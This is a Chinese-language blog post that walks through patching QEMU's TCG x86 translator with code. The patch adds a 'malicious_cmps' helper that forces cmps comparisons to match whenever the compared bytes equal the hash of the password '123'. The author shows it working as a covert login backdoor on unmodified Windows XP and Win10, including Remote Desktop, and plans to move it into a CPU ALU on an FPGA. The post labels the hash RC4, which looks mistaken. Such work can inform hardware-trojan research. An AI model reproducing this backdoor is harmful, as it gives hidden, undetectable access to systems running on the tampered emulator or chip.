u@home:~$

在qemu tcg里改指令

在tcg里对一些指令做hook,unicorn就是搞这个,比如两年前的代码里,主要就是hook了syscall指令。现在好像在搞啥trace。

简单的说,要hook一条指令,有几个地方要改。以x86为例,qemu tcg解析指令的函数是:

qemu/target/i386/tcg/translate.c (unicorn代码比较老,是qemu/target/i386/translate.c)

static target_ulong disas_insn (DisasContext *s, CPUState *cpu);

这里面是个非常大的switch case。

比如要解析

0:  67 f3 a7                repz cmps DWORD PTR ds:[esi],DWORD PTR es:[edi] 

67是prefix,表明是在64位系统下用32位寄存器esi edi。f3也是prefix,表示指令前面的repz。

找解析这条语句的地方就在switch case里找a7。

    case 0xa6: /* cmpsS */
    case 0xa7:
        ot = mo_b_d(b, dflag);
        if (prefixes & PREFIX_REPNZ) {
            gen_repz_cmps(s, ot, pc_start - s->cs_base, s->pc - s->cs_base, 1);
        } else if (prefixes & PREFIX_REPZ) {
            gen_repz_cmps(s, ot, pc_start - s->cs_base, s->pc - s->cs_base, 0);
        } else {
            gen_cmps(s, ot);
        }
        break;

因为是repz,所以处理这条指令的函数就是gen_repz_cmps

这个函数名前面的gen意思是这个函数是会被编译成目标代码的,运行在虚拟机里面,所以函数里用指针和内存的时候都不能直接用。这个一会再说。

和gen_cmps不一样,gen_repz_cmps这个函数名本身还是生成出来的。

/* same method as Valgrind : we generate jumps to current or next
   instruction */
#define GEN_REPZ(op)                                                          \
static inline void gen_repz_ ## op(DisasContext *s, MemOp ot,              \
                                 target_ulong cur_eip, target_ulong next_eip) \
{                                                                             \
    TCGLabel *l2;                                                             \
    gen_update_cc_op(s);                                                      \
    l2 = gen_jz_ecx_string(s, next_eip);                                      \
    gen_ ## op(s, ot);                                                        \
    gen_op_add_reg_im(s, s->aflag, R_ECX, -1);                                \
    /* a loop would cause two single step exceptions if ECX = 1               \
       before rep string_insn */                                              \
    if (s->repz_opt)                                                          \
        gen_op_jz_ecx(s, s->aflag, l2);                                       \
    gen_jmp(s, cur_eip);                                                      \
}

#define GEN_REPZ2(op)                                                         \
static inline void gen_repz_ ## op(DisasContext *s, MemOp ot,              \
                                   target_ulong cur_eip,                      \
                                   target_ulong next_eip,                     \
                                   int nz)                                    \
{                                                                             \
    TCGLabel *l2;                                                             \
    gen_update_cc_op(s);                                                      \
    l2 = gen_jz_ecx_string(s, next_eip);                                      \
    gen_ ## op(s, ot);                                                        \
    gen_op_add_reg_im(s, s->aflag, R_ECX, -1);                                \
    gen_update_cc_op(s);                                                      \
    gen_jcc1(s, (JCC_Z << 1) | (nz ^ 1), l2);                                 \
    if (s->repz_opt)                                                          \
        gen_op_jz_ecx(s, s->aflag, l2);                                       \
    gen_jmp(s, cur_eip);                                                      \
}

GEN_REPZ(movs)
GEN_REPZ(stos)
GEN_REPZ(lods)
GEN_REPZ(ins)
GEN_REPZ(outs)
GEN_REPZ2(scas)
GEN_REPZ2(cmps)

所以要hook repz cmps这条指令,还要自己新建个函数,名字就是gen_repz_cmps,并且把 GEN_REPZ2(cmps) 这句注释掉。

static inline void gen_repz_cmps (DisasContext *s, MemOp ot,              
                                   target_ulong cur_eip,                  
                                   target_ulong next_eip,                 
                                   int nz)                                
{                                                                         
    TCGLabel *l2;                                                         
    gen_update_cc_op(s);                                                  
    l2 = gen_jz_ecx_string(s, next_eip);                                  
    gen_ ## op(s, ot);                                                    
    gen_op_add_reg_im(s, s->aflag, R_ECX, -1);                            
    gen_update_cc_op(s);                                                  
    gen_jcc1(s, (JCC_Z << 1) | (nz ^ 1), l2);                             
    if (s->repz_opt)                                                      
        gen_op_jz_ecx(s, s->aflag, l2);                                   
    gen_jmp(s, cur_eip);                                                  
}

等等,刚看到,这个函数里面还是要调用

    gen_ ## op(s, ot);                                                        \

所以最终还是在gen_cmps()里处理每一次的cmps就行了。其它部分是rcx减1,判断比较结果和跳转的。

static inline void gen_cmps(DisasContext *s, MemOp ot)
{
    gen_string_movl_A0_EDI(s);
    gen_op_ld_v(s, ot, s->T1, s->A0);
    gen_string_movl_A0_ESI(s);
    gen_op(s, OP_CMPL, ot, OR_TMP0);
    gen_op_movl_T0_Dshift(s, ot);
    gen_op_add_reg_T0(s, s->aflag, R_ESI);
    gen_op_add_reg_T0(s, s->aflag, R_EDI);
}

第一句, EDI里的地址取值从到A0里,A0应该是个tcg语言的中间寄存器。

static inline void gen_string_movl_A0_EDI(DisasContext *s)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    gen_lea_v_seg(s, s->aflag, tcg_ctx->cpu_regs[R_EDI], R_ES, -1);
}


/* Compute SEG:REG into A0.  SEG is selected from the override segment
   (OVR_SEG) and the default segment (DEF_SEG).  OVR_SEG may be -1 to
   indicate no override.  */
static void gen_lea_v_seg(DisasContext *s, MemOp aflag, TCGv a0,
                          int def_seg, int ovr_seg)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;

    switch (aflag) {
#ifdef TARGET_X86_64
    case MO_64:
        if (ovr_seg < 0) {
            tcg_gen_mov_tl(tcg_ctx, s->A0, a0);
            return;
        }
        break;
#endif
    case MO_32:
        /* 32 bit address */
        if (ovr_seg < 0 && s->addseg) {
            ovr_seg = def_seg;
        }
        if (ovr_seg < 0) {
            tcg_gen_ext32u_tl(tcg_ctx, s->A0, a0);
            return;
        }
        break;
    case MO_16:
        /* 16 bit address */
        tcg_gen_ext16u_tl(tcg_ctx, s->A0, a0);
        a0 = s->A0;
        if (ovr_seg < 0) {
            if (s->addseg) {
                ovr_seg = def_seg;
            } else {
                return;
            }
        }
        break;
    default:
        tcg_abort();
    }

    if (ovr_seg >= 0) {
        TCGv seg = tcg_ctx->cpu_seg_base[ovr_seg];

        if (aflag == MO_64) {
            tcg_gen_add_tl(tcg_ctx, s->A0, a0, seg);
        } else if (CODE64(s)) {
            tcg_gen_ext32u_tl(tcg_ctx, s->A0, a0);
            tcg_gen_add_tl(tcg_ctx, s->A0, s->A0, seg);
        } else {
            tcg_gen_add_tl(tcg_ctx, s->A0, a0, seg);
            tcg_gen_ext32u_tl(tcg_ctx, s->A0, s->A0);
        }
    }
}

第二句

static inline void gen_op_ld_v(DisasContext *s, int idx, TCGv t0, TCGv a0)
{
    tcg_gen_qemu_ld_tl(t0, a0, s->mem_index, idx | MO_LE);
}

可以看到unicorn的代码里这里加了读内存的hook。

static inline void gen_op_ld_v(DisasContext *s, int idx, TCGv t0, TCGv a0)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;

    if (HOOK_EXISTS(s->uc, UC_HOOK_MEM_READ))
        gen_jmp_im(s, s->prev_pc); // Unicorn: sync EIP

    tcg_gen_qemu_ld_tl(tcg_ctx, t0, a0, s->mem_index, idx | MO_LE);
}

qemu/include/tcg/tcg-op.h

#define tcg_gen_qemu_ld_tl tcg_gen_qemu_ld_i32

qemu/tcg/tcg-op.c

void tcg_gen_qemu_ld_i32(TCGv_i32 val, TCGv addr, TCGArg idx, MemOp memop)
{
    MemOp orig_memop;
    MemOpIdx oi;

    tcg_gen_req_mo(TCG_MO_LD_LD | TCG_MO_ST_LD);
    memop = tcg_canonicalize_memop(memop, 0, 0);
    oi = make_memop_idx(memop, idx);
    trace_guest_ld_before_tcg(tcg_ctx->cpu, cpu_env, addr, oi);

    orig_memop = memop;
    if (!TCG_TARGET_HAS_MEMORY_BSWAP && (memop & MO_BSWAP)) {
        memop &= ~MO_BSWAP;
        /* The bswap primitive benefits from zero-extended input.  */
        if ((memop & MO_SSIZE) == MO_SW) {
            memop &= ~MO_SIGN;
        }
    }

    addr = plugin_prep_mem_callbacks(addr);
    gen_ldst_i32(INDEX_op_qemu_ld_i32, val, addr, memop, idx);
    plugin_gen_mem_callbacks(addr, oi, QEMU_PLUGIN_MEM_R);

    if ((orig_memop ^ memop) & MO_BSWAP) {
        switch (orig_memop & MO_SIZE) {
        case MO_16:
            tcg_gen_bswap16_i32(val, val, (orig_memop & MO_SIGN
                                           ? TCG_BSWAP_IZ | TCG_BSWAP_OS
                                           : TCG_BSWAP_IZ | TCG_BSWAP_OZ));
            break;
        case MO_32:
            tcg_gen_bswap32_i32(val, val);
            break;
        default:
            g_assert_not_reached();
        }
    }
}

看样qemu也开始加plugin了,这些不用管。看函数的参数,地址A0里的值读到t0。 也就是

 gen_op_ld_v(s, ot, s->T1, s->A0);

里的s->T1。

顺便看下DisasContext结构,里面A0 T0 T1都是TCG local temps,应该就是tcg虚拟机内部寄存器。

target/i386/tcg/translate.c

typedef struct DisasContext {
    DisasContextBase base;

    target_ulong pc;       /* pc = eip + cs_base */
    target_ulong pc_start; /* pc at TB entry */
    target_ulong cs_base;  /* base of CS segment */

    MemOp aflag;
    MemOp dflag;

    int8_t override; /* -1 if no override, else R_CS, R_DS, etc */
    uint8_t prefix;

#ifndef CONFIG_USER_ONLY
    uint8_t cpl;   /* code priv level */
    uint8_t iopl;  /* i/o priv level */
#endif
    uint8_t vex_l;  /* vex vector length */
    uint8_t vex_v;  /* vex vvvv register, without 1's complement.  */
    uint8_t popl_esp_hack; /* for correct popl with esp base handling */
    uint8_t rip_offset; /* only used in x86_64, but left for simplicity */

#ifdef TARGET_X86_64
    uint8_t rex_r;
    uint8_t rex_x;
    uint8_t rex_b;
    bool rex_w;
#endif
    bool jmp_opt; /* use direct block chaining for direct jumps */
    bool repz_opt; /* optimize jumps within repz instructions */
    bool cc_op_dirty;

    CCOp cc_op;  /* current CC operation */
    int mem_index; /* select memory access functions */
    uint32_t flags; /* all execution flags */
    int cpuid_features;
    int cpuid_ext_features;
    int cpuid_ext2_features;
    int cpuid_ext3_features;
    int cpuid_7_0_ebx_features;
    int cpuid_xsave_features;

    /* TCG local temps */
    TCGv cc_srcT;
    TCGv A0;
    TCGv T0;
    TCGv T1;

    /* TCG local register indexes (only used inside old micro ops) */
    TCGv tmp0;
    TCGv tmp4;
    TCGv_ptr ptr0;
    TCGv_ptr ptr1;
    TCGv_i32 tmp2_i32;
    TCGv_i32 tmp3_i32;
    TCGv_i64 tmp1_i64;

    sigjmp_buf jmpbuf;
} DisasContext;

gen_op涉及到这两个参数, OP_CMPL OR_TMP0

/* if d == OR_TMP0, it means memory operand (address in A0) */
static void gen_op(DisasContext *s1, int op, MemOp ot, int d)
{
    if (d != OR_TMP0) {
        if (s1->prefix & PREFIX_LOCK) {
            /* Lock prefix when destination is not memory.  */
            gen_illegal_opcode(s1);
            return;
        }
        gen_op_mov_v_reg(s1, ot, s1->T0, d);
    } else if (!(s1->prefix & PREFIX_LOCK)) {
        gen_op_ld_v(s1, ot, s1->T0, s1->A0);
    }
    switch(op) {
    case OP_ADCL:
        gen_compute_eflags_c(s1, s1->tmp4);
        if (s1->prefix & PREFIX_LOCK) {
            tcg_gen_add_tl(s1->T0, s1->tmp4, s1->T1);
            tcg_gen_atomic_add_fetch_tl(s1->T0, s1->A0, s1->T0,
                                        s1->mem_index, ot | MO_LE);
        } else {
            tcg_gen_add_tl(s1->T0, s1->T0, s1->T1);
            tcg_gen_add_tl(s1->T0, s1->T0, s1->tmp4);
            gen_op_st_rm_T0_A0(s1, ot, d);
        }
        gen_op_update3_cc(s1, s1->tmp4);
        set_cc_op(s1, CC_OP_ADCB + ot);
        break;
    case OP_SBBL:
        gen_compute_eflags_c(s1, s1->tmp4);
        if (s1->prefix & PREFIX_LOCK) {
            tcg_gen_add_tl(s1->T0, s1->T1, s1->tmp4);
            tcg_gen_neg_tl(s1->T0, s1->T0);
            tcg_gen_atomic_add_fetch_tl(s1->T0, s1->A0, s1->T0,
                                        s1->mem_index, ot | MO_LE);
        } else {
            tcg_gen_sub_tl(s1->T0, s1->T0, s1->T1);
            tcg_gen_sub_tl(s1->T0, s1->T0, s1->tmp4);
            gen_op_st_rm_T0_A0(s1, ot, d);
        }
        gen_op_update3_cc(s1, s1->tmp4);
        set_cc_op(s1, CC_OP_SBBB + ot);
        break;
    case OP_ADDL:
        if (s1->prefix & PREFIX_LOCK) {
            tcg_gen_atomic_add_fetch_tl(s1->T0, s1->A0, s1->T1,
                                        s1->mem_index, ot | MO_LE);
        } else {
            tcg_gen_add_tl(s1->T0, s1->T0, s1->T1);
            gen_op_st_rm_T0_A0(s1, ot, d);
        }
        gen_op_update2_cc(s1);
        set_cc_op(s1, CC_OP_ADDB + ot);
        break;
    case OP_SUBL:
        if (s1->prefix & PREFIX_LOCK) {
            tcg_gen_neg_tl(s1->T0, s1->T1);
            tcg_gen_atomic_fetch_add_tl(s1->cc_srcT, s1->A0, s1->T0,
                                        s1->mem_index, ot | MO_LE);
            tcg_gen_sub_tl(s1->T0, s1->cc_srcT, s1->T1);
        } else {
            tcg_gen_mov_tl(s1->cc_srcT, s1->T0);
            tcg_gen_sub_tl(s1->T0, s1->T0, s1->T1);
            gen_op_st_rm_T0_A0(s1, ot, d);
        }
        gen_op_update2_cc(s1);
        set_cc_op(s1, CC_OP_SUBB + ot);
        break;
    default:
    case OP_ANDL:
        if (s1->prefix & PREFIX_LOCK) {
            tcg_gen_atomic_and_fetch_tl(s1->T0, s1->A0, s1->T1,
                                        s1->mem_index, ot | MO_LE);
        } else {
            tcg_gen_and_tl(s1->T0, s1->T0, s1->T1);
            gen_op_st_rm_T0_A0(s1, ot, d);
        }
        gen_op_update1_cc(s1);
        set_cc_op(s1, CC_OP_LOGICB + ot);
        break;
    case OP_ORL:
        if (s1->prefix & PREFIX_LOCK) {
            tcg_gen_atomic_or_fetch_tl(s1->T0, s1->A0, s1->T1,
                                       s1->mem_index, ot | MO_LE);
        } else {
            tcg_gen_or_tl(s1->T0, s1->T0, s1->T1);
            gen_op_st_rm_T0_A0(s1, ot, d);
        }
        gen_op_update1_cc(s1);
        set_cc_op(s1, CC_OP_LOGICB + ot);
        break;
    case OP_XORL:
        if (s1->prefix & PREFIX_LOCK) {
            tcg_gen_atomic_xor_fetch_tl(s1->T0, s1->A0, s1->T1,
                                        s1->mem_index, ot | MO_LE);
        } else {
            tcg_gen_xor_tl(s1->T0, s1->T0, s1->T1);
            gen_op_st_rm_T0_A0(s1, ot, d);
        }
        gen_op_update1_cc(s1);
        set_cc_op(s1, CC_OP_LOGICB + ot);
        break;
    case OP_CMPL:
        tcg_gen_mov_tl(cpu_cc_src, s1->T1);
        tcg_gen_mov_tl(s1->cc_srcT, s1->T0);
        tcg_gen_sub_tl(cpu_cc_dst, s1->T0, s1->T1);
        set_cc_op(s1, CC_OP_SUBB + ot);
        break;
    }
}

基本意思就是把A0地址里的值读出送到T0,然后和T1里的值做减法并设置标志位。

下一句,gen_op_movl_T0_Dshift(s, ot); 是读D flag到T0去

Directional Flag (D) – This flag is specifically used in string instructions. If directional flag is set (1), then access the string data from higher memory location towards lower memory location. If directional flag is reset (0), then access the string data from lower memory location towards higher memory location.

后面两句

    gen_op_add_reg_T0(s, s->aflag, R_ESI);
    gen_op_add_reg_T0(s, s->aflag, R_EDI);

就是根据D flag,ESI和EDI地址都递增或递减。


要改变cmps的结果,关键是要修改gen_op(s, OP_CMPL, ot, OR_TMP0);这句。 在里面的减法操作里,关键是要改标志位。

    case OP_CMPL:
        tcg_gen_mov_tl(cpu_cc_src, s1->T1);
        tcg_gen_mov_tl(s1->cc_srcT, s1->T0);
        tcg_gen_sub_tl(cpu_cc_dst, s1->T0, s1->T1);
        set_cc_op(s1, CC_OP_SUBB + ot);
        break;
    }
}

又涉及到set_cc_op(), 而这个标志位又比较复杂,看下面这段注释。

/* Instead of computing the condition codes after each x86 instruction,
 * QEMU just stores one operand (called CC_SRC), the result
 * (called CC_DST) and the type of operation (called CC_OP). When the
 * condition codes are needed, the condition codes can be calculated
 * using this information. Condition codes are not generated if they
 * are only needed for conditional branches.
 */
typedef enum {
    CC_OP_DYNAMIC, /* must use dynamic code to get cc_op */
    CC_OP_EFLAGS,  /* all cc are explicitly computed, CC_SRC = flags */

    CC_OP_MULB, /* modify all flags, C, O = (CC_SRC != 0) */
    CC_OP_MULW,
    CC_OP_MULL,
    CC_OP_MULQ,

    CC_OP_ADDB, /* modify all flags, CC_DST = res, CC_SRC = src1 */
    CC_OP_ADDW,
    CC_OP_ADDL,
    CC_OP_ADDQ,

    CC_OP_ADCB, /* modify all flags, CC_DST = res, CC_SRC = src1 */
    CC_OP_ADCW,
    CC_OP_ADCL,
    CC_OP_ADCQ,

    CC_OP_SUBB, /* modify all flags, CC_DST = res, CC_SRC = src1 */
    CC_OP_SUBW,
    CC_OP_SUBL,
    CC_OP_SUBQ,

    CC_OP_SBBB, /* modify all flags, CC_DST = res, CC_SRC = src1 */
    CC_OP_SBBW,
    CC_OP_SBBL,
    CC_OP_SBBQ,

    CC_OP_LOGICB, /* modify all flags, CC_DST = res */
    CC_OP_LOGICW,
    CC_OP_LOGICL,
    CC_OP_LOGICQ,

    CC_OP_INCB, /* modify all flags except, CC_DST = res, CC_SRC = C */
    CC_OP_INCW,
    CC_OP_INCL,
    CC_OP_INCQ,

    CC_OP_DECB, /* modify all flags except, CC_DST = res, CC_SRC = C  */
    CC_OP_DECW,
    CC_OP_DECL,
    CC_OP_DECQ,

    CC_OP_SHLB, /* modify all flags, CC_DST = res, CC_SRC.msb = C */
    CC_OP_SHLW,
    CC_OP_SHLL,
    CC_OP_SHLQ,

    CC_OP_SARB, /* modify all flags, CC_DST = res, CC_SRC.lsb = C */
    CC_OP_SARW,
    CC_OP_SARL,
    CC_OP_SARQ,

    CC_OP_BMILGB, /* Z,S via CC_DST, C = SRC==0; O=0; P,A undefined */
    CC_OP_BMILGW,
    CC_OP_BMILGL,
    CC_OP_BMILGQ,

    CC_OP_ADCX, /* CC_DST = C, CC_SRC = rest.  */
    CC_OP_ADOX, /* CC_DST = O, CC_SRC = rest.  */
    CC_OP_ADCOX, /* CC_DST = C, CC_SRC2 = O, CC_SRC = rest.  */

    CC_OP_CLR, /* Z set, all other flags clear.  */
    CC_OP_POPCNT, /* Z via CC_SRC, all other flags clear.  */

    CC_OP_NB,
} CCOp;

为了改cmp的结构,比如改成想等,我是不是可以这样

    case OP_CMPL:
        tcg_gen_mov_tl(cpu_cc_src, 0);
        tcg_gen_mov_tl(s1->cc_srcT, 0);
        tcg_gen_sub_tl(cpu_cc_dst, 0, 0);
        set_cc_op(s1, CC_OP_SUBB + ot);
        break;
    }
}

因为比较指令不会把值传给任何地方,所以我都用0。这样在后面用到flag的时候,比较后的值也会是想等。 要验证下这里直接给0行不行。这里的参数类型是TCGv_i64。

/* Define type and accessor macros for TCG variables.

   TCG variables are the inputs and outputs of TCG ops, as described
   in tcg/README. Target CPU front-end code uses these types to deal
   with TCG variables as it emits TCG code via the tcg_gen_* functions.
   They come in several flavours:
    * TCGv_i32 : 32 bit integer type
    * TCGv_i64 : 64 bit integer type
    * TCGv_ptr : a host pointer type
    * TCGv_vec : a host vector type; the exact size is not exposed
                 to the CPU front-end code.
    * TCGv : an integer type the same size as target_ulong
             (an alias for either TCGv_i32 or TCGv_i64)
   The compiler's type checking will complain if you mix them
   up and pass the wrong sized TCGv to a function.

   Users of tcg_gen_* don't need to know about any of the internal
   details of these, and should treat them as opaque types.
   You won't be able to look inside them in a debugger either.

   Internal implementation details follow:

   Note that there is no definition of the structs TCGv_i32_d etc anywhere.
   This is deliberate, because the values we store in variables of type
   TCGv_i32 are not really pointers-to-structures. They're just small
   integers, but keeping them in pointer types like this means that the
   compiler will complain if you accidentally pass a TCGv_i32 to a
   function which takes a TCGv_i64, and so on. Only the internals of
   TCG need to care about the actual contents of the types.  */

typedef struct TCGv_i32_d *TCGv_i32;
typedef struct TCGv_i64_d *TCGv_i64;
typedef struct TCGv_ptr_d *TCGv_ptr;
typedef struct TCGv_vec_d *TCGv_vec;
typedef TCGv_ptr TCGv_env;
#if TARGET_LONG_BITS == 32
#define TCGv TCGv_i32
#elif TARGET_LONG_BITS == 64
#define TCGv TCGv_i64
#else
#error Unhandled TARGET_LONG_BITS value
#endif

现在看要怎样插入代码进取。在disas_insn()里,是不能用printf的,要想加自己的功能,需要加helper函数。

例如,在disas_insn()里处理读cr寄存器的代码

        if (b & 2) {
            gen_svm_check_intercept(s, SVM_EXIT_WRITE_CR0 + reg);
            gen_op_mov_v_reg(s, ot, s->T0, rm);
            gen_helper_write_crN(cpu_env, tcg_constant_i32(reg), s->T0);
            gen_jmp_im(s, s->pc - s->cs_base);
            gen_eob(s);
        } else {
            gen_svm_check_intercept(s, SVM_EXIT_READ_CR0 + reg);
            gen_helper_read_crN(s->T0, cpu_env, tcg_constant_i32(reg));
            gen_op_mov_reg_v(s, ot, rm, s->T0);
            if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) {
                gen_jmp(s, s->pc - s->cs_base);
            }
        }
        break;

里面是叫gen_helper_read_crN(),gen表示代码会被重新生成。 而函数的实现是在

target/i386/tcg/sysemu/misc_helper.c

target_ulong helper_read_crN(CPUX86State *env, int reg)
{
    target_ulong val;

    switch (reg) {
    default:
        val = env->cr[reg];
        break;
    case 8:
        if (!(env->hflags2 & HF2_VINTR_MASK)) {
            val = cpu_get_apic_tpr(env_archcpu(env)->apic_state);
        } else {
            val = env->int_ctl & V_TPR_MASK;
        }
        break;
    }
    return val;
}

名字不一样,没有了前面的gen。 而这个函数是需要用宏声明的

target/i386/helper.h

DEF_HELPER_1(rdmsr, void, env)
DEF_HELPER_1(wrmsr, void, env)
DEF_HELPER_FLAGS_2(read_crN, TCG_CALL_NO_RWG, tl, env, int)
DEF_HELPER_FLAGS_3(write_crN, TCG_CALL_NO_RWG, void, env, int, tl)
#endif /* !CONFIG_USER_ONLY */

而声明的时候,名字前面的helper也没了。 一般第二个参数是返回值,后面是相应的函数的参数。 但这个是DEF_HELPER_FLAGS_2,所以第二个参数插入了一个flag,还不知道这个flag是什么作用,定义在这里。

include/tcg/tcg.h

/* call flags */
/* Helper does not read globals (either directly or through an exception). It
   implies TCG_CALL_NO_WRITE_GLOBALS. */
#define TCG_CALL_NO_READ_GLOBALS    0x0001
/* Helper does not write globals */
#define TCG_CALL_NO_WRITE_GLOBALS   0x0002
/* Helper can be safely suppressed if the return value is not used. */
#define TCG_CALL_NO_SIDE_EFFECTS    0x0004
/* Helper is QEMU_NORETURN.  */
#define TCG_CALL_NO_RETURN          0x0008

/* convenience version of most used call flags */
#define TCG_CALL_NO_RWG         TCG_CALL_NO_READ_GLOBALS
#define TCG_CALL_NO_WG          TCG_CALL_NO_WRITE_GLOBALS
#define TCG_CALL_NO_SE          TCG_CALL_NO_SIDE_EFFECTS
#define TCG_CALL_NO_RWG_SE      (TCG_CALL_NO_RWG | TCG_CALL_NO_SE)
#define TCG_CALL_NO_WG_SE       (TCG_CALL_NO_WG | TCG_CALL_NO_SE)


先举个例子测试下。

在target/i386/tcg/sysemu/misc_helper.c里加上这个helper_malicious_cmps(),没有返回值。 因为刚才加返回值总crash,先来个简单的。

void helper_malicious_cmps(CPUX86State *env, uint32_t edi)
{
    if (edi == 0x97e6bd3d || edi == 0xa79016d7 || edi == 0xeb4b2069 || edi == 0x78362812)
    {
        printf("helper_malicious_cmps: edi 0x%x\n", edi);
    }
}

gen_cmps()里加调用这个helper函数,传进的参数是edi里的地址读出来的值,上一条代码把它存在s->T1了。

static inline void gen_cmps(DisasContext *s, MemOp ot)
{   
    gen_string_movl_A0_EDI(s);
    gen_op_ld_v(s, ot, s->T1, s->A0);

    // uty: test
    gen_helper_malicious_cmps(cpu_env, s->T1);

    gen_string_movl_A0_ESI(s);
    gen_op(s, OP_CMPL, ot, OR_TMP0);
    gen_op_movl_T0_Dshift(s, ot);
    gen_op_add_reg_T0(s, s->aflag, R_ESI);
    gen_op_add_reg_T0(s, s->aflag, R_EDI);
}

还需要在target/i386/helper.h里声明这个helper函数,i32作为参数类型编译时没出warning,还凑合。

DEF_HELPER_2(malicious_cmps, void, env, i32)

加了这几句,编译好了跑下虚拟机,结果还真对了。

u@unamed:~/prjs/vm/xpsp3$ ./startvm.sh 
QEMU 6.1.93 monitor - type 'help' for more information
(qemu) helper_malicious_cmps: edi 0x97e6bd3d

代码里是123的rc4 hash,当我输入密码时,tcg里刚加的这个helper确实找到了最开头的4个字节0x97e6bd3d。 由于这4个字节比较就没通过,所以也没有后续的12字节过来做比较了。

系统是xpsp3,没有做过改动,里面调用的RtlCompareMemory(),到一条repz cmps指令,最终到单个的cmps指令。


TCGv的变量,只能用tcg_gen_*系列的函数(例如tcg_gen_movcond_tl())来操作,不能直接在代码里读写。

而上面说的helper函数,传进的TCGv是做过转化的,在helper函数里可以直接访问。 helper函数返回值也是TCGv的类型。

static inline void gen_cmps(DisasContext *s, MemOp ot)
{
    TCGv ret0;
    ret0 = tcg_temp_local_new();

    gen_string_movl_A0_EDI(s);
    gen_op_ld_v(s, ot, s->T1, s->A0);
    gen_string_movl_A0_ESI(s);

    // uty: test

    /* store value = (old == cmp ? new : old);  */
    //tcg_gen_movcond_tl(TCG_COND_EQ, newv, oldv, cmpv, newv, oldv);

    gen_helper_malicious_cmps(ret0, cpu_env, s->T1);

    //gen_op(s, OP_CMPL, ot, OR_TMP0);
    gen_malicious_op(s, OP_CMPL, ot, OR_TMP0, ret0);

    gen_op_movl_T0_Dshift(s, ot);
    gen_op_add_reg_T0(s, s->aflag, R_ESI);
    gen_op_add_reg_T0(s, s->aflag, R_EDI);

    tcg_temp_free(ret0);
}
// uty: test
target_ulong helper_malicious_cmps(CPUX86State *env, uint32_t edi)
{
    target_ulong val = 0;

    if (edi == 0x97e6bd3d || edi == 0xa79016d7 || edi == 0xeb4b2069 || edi == 0x78362812)
    {
        printf("helper_malicious_cmps: edi 0x%x\n", edi);
        val = 1;
    }
    
    return val;
} 

helper函数的好处就是可以printf,直接写一般c程序就行。 不好搞的地方就是helper的返回值是TCGv,不能直接用,比如不能if (0 != ret0) 要用tcg_gen_*这种tcg开头的函数处理TCGv。

要用条件语句的话就可以用tcg_gen_movcond_tl()这种。不过这个没有文档,参数又多,只在代码里发现这么次调用, 解释了用法。

    /* store value = (old == cmp ? new : old);  */
    //tcg_gen_movcond_tl(TCG_COND_EQ, newv, oldv, cmpv, newv, oldv);

一旦发现是要找的特殊值,就直接把比较的结果改了,比如T0 T1都改成1,怎么比较都是相等的了。

    case OP_CMPL:
        {
        // uty: test
        TCGv one;
        one = tcg_constant_tl(1); // no need to free
        tcg_gen_movcond_tl(TCG_COND_EQ, s1->T0, ret0, one, one, s1->T0);
        tcg_gen_movcond_tl(TCG_COND_EQ, s1->T1, ret0, one, one, s1->T1);

        tcg_gen_mov_tl(cpu_cc_src, s1->T1);
        tcg_gen_mov_tl(s1->cc_srcT, s1->T0);
        tcg_gen_sub_tl(cpu_cc_dst, s1->T0, s1->T1);
        set_cc_op(s1, CC_OP_SUBB + ot);

        tcg_temp_free(one); // tcg_temp_free will simply ignore it
        }
        break;

不用helper函数也行,在这里多加几个tcg_gen_mov_tl来判断值就行。 有helper主要是方便printf。

效果图,xp系统没改动。 xp_screenshot


这个是在windows系统上验证。 测cpu的时候就没法搞x86了,只能是sparc或者risc-v,而且也装不上windows,只能实验unix/linux系统。

刚才又试了下在创建新用户设置密码的思时候用了同样的密码123,结果还行,没出现冲突。有意思的时, 当这个用户登陆的时候,这个16字节的rc4 hash会被cmps两边,现象就是上面的图上,输出的部分多了一 边。也没去看这算什么情况,不影响登陆。


后来又试了下Win10 64位,本以为会有些变化,结果还是rc4,代码几乎不用变,只要在x86_64上编译就可以了。

也就是说,只要是装Windows操作系统(没有验证全部,只试了xp 32bit,win10 64bit),这个后门就会隐蔽的一直发挥作用。 远程桌面也是通过这套验证逻辑,也可以用。域控制器还没试过。

#ifdef TARGET_X86_64
target_ulong helper_malicious_cmps(CPUX86State *env, uint64_t rdi)
{
    target_ulong val = 0;

    //printf("helper_malicious_cmps: rdi 0x%llx\n", (long long unsigned int)rdi);

    if (rdi == 0xa79016d797e6bd3d || rdi == 0x78362812eb4b2069)
    {
        printf("helper_malicious_cmps: edi 0x%llx\n", (long long unsigned int)rdi);
        val = 1;
    }
    
    return val;
}
#else
target_ulong helper_malicious_cmps(CPUX86State *env, uint32_t edi)
{
    target_ulong val = 0;


    if (edi == 0x97e6bd3d || edi == 0xa79016d7 || edi == 0xeb4b2069 || edi == 0x78362812)
    {
        printf("helper_malicious_cmps: edi 0x%x\n", edi);
        val = 1;
    }

    return val;
}
#endif

还有就是编译的时候,configure的参数,之前是这样,在build目录下,带了好几个参数。

../configure --target-list=x86_64-softmmu --enable-tcg-interpreter --enable-debug-tcg --enable-debug-info

–enable-tcg-interpreter –enable-debug-tcg –enable-debug-info 这几个参数会让编译出来的虚拟机特别慢。 而且试了下好像也不需要。只用指定是x86_64-softmmu或者i386-softmmu就行,这就会用tcg了。

../configure --target-list=x86_64-softmmu

win10_x64_screenshot


后面就是实现在CPU的ALU里,在FPGA上跑。